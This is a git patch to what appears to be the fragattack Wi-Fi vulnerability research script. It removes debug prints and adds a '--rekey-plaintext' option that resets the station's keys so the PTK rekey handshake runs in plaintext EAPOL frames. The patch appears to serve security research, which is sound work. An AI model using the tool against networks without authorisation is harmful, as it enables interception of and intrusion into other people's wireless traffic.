From b298bdafaae3835ae69eff7881ccb78cf62e7087 Mon Sep 17 00:00:00 2001 From: Mathy Date: Fri, 24 Apr 2020 14:02:05 -0400 Subject: [PATCH] fragattack: option to perform PTK rekey in plaintext --- research/fragattack.py | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/research/fragattack.py b/research/fragattack.py index 94dabbf96..ab9c161b3 100755 --- a/research/fragattack.py +++ b/research/fragattack.py @@ -289,9 +289,7 @@ class PingTest(Test): elif act.action == Action.Inject: fragnums.append(next_fragnum) next_fragnum += 1 - print("Actions before:", self.actions) self.actions = list(filter(lambda act: not act.is_meta(Action.MetaDrop), self.actions)) - print("Actions after:", self.actions) # Generate all the individual (fragmented) frames num_frags = len(self.get_actions(Action.Inject)) @@ -1051,6 +1049,12 @@ class Supplicant(Daemon): if self.options.rekey_request: log(STATUS, "Actively requesting PTK rekey", color="green") wpaspy_command(self.wpaspy_ctrl, "KEY_REQUEST 0 1") + + # The RT-AC51U does the 4-way rekey HS in plaintext. So in some cases we must + # remove the keys so our script will send the EAPOL frames in plaintext. + if self.options.rekey_plaintext: + log(STATUS, "Removing keys to perform rekey using plaintext EAPOL frames") + self.station.reset_keys() else: log(STATUS, "Client cannot force rekey. Waiting on AP to start PTK rekey.", color="orange") @@ -1374,6 +1378,7 @@ if __name__ == "__main__": parser.add_argument('--dhcp', default=False, action='store_true', help="Override default request with DHCP discover.") parser.add_argument('--icmp', default=False, action='store_true', help="Override default request with ICMP ping request.") parser.add_argument('--rekey-request', default=False, action='store_true', help="Actively request PTK rekey as client.") + parser.add_argument('--rekey-plaintext', default=False, action='store_true', help="Do PTK rekey with plaintext EAPOL frames.") args = parser.parse_args() ptype = args2ptype(args) @@ -1386,6 +1391,7 @@ if __name__ == "__main__": options.ip = args.ip options.peerip = args.peerip options.rekey_request = args.rekey_request + options.rekey_plaintext = args.rekey_plaintext # Parse remaining options global_log_level -= args.debug